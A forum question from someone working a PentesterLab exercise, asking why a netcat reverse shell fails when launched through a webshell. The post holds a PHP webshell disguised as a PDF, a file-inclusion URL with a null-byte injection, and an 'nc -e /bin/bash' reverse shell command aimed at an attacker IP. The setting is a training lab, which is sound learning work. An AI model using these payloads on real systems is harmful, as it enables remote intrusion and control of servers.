# Failed to connect to netcat reverse shell

Tags: php, security, shell, web-applications, penetration-testing

I am doing an exercise of PentesterLab, 
I've got a webshell called 1.pdf, and it can be included in index.php as a PHP file. It contains code like this:

```
%PDF-1.4
<?php
echo system($_GET["cmd"]);
?>
```

Now I want to create a reverse shell using nc with following commands, but it does not work properly:

```
index.php?page=uploads/1.pdf%00&cmd=/bin/nc 192.168.117.128 8001 -e /bin/bash
```

If I input commands at 192.168.117.128 then enter, nothing was output.

While, if I run the following commands directly in the VM(the target server), it connects to the attacker properly:

```
/bin/nc 192.168.117.128 8001 -e /bin/bash
```

Output of commands are properly echoed at 192.168.117.128

I wonder why netcat works in VM properly but does not work in webshell?
Anyone's help is appreciated, thanks.

Comment: Is the VM you are talking about the target system as well? What happens if you try a different command like `echo …` or with stderr redirection `… 2>&1`?

Comment: yes, the VM is the target system. And others commands seem to work properly, such as 'whoami', 'ls /', 'uname' etc...

Comment: Anyone's help? Thanks so much.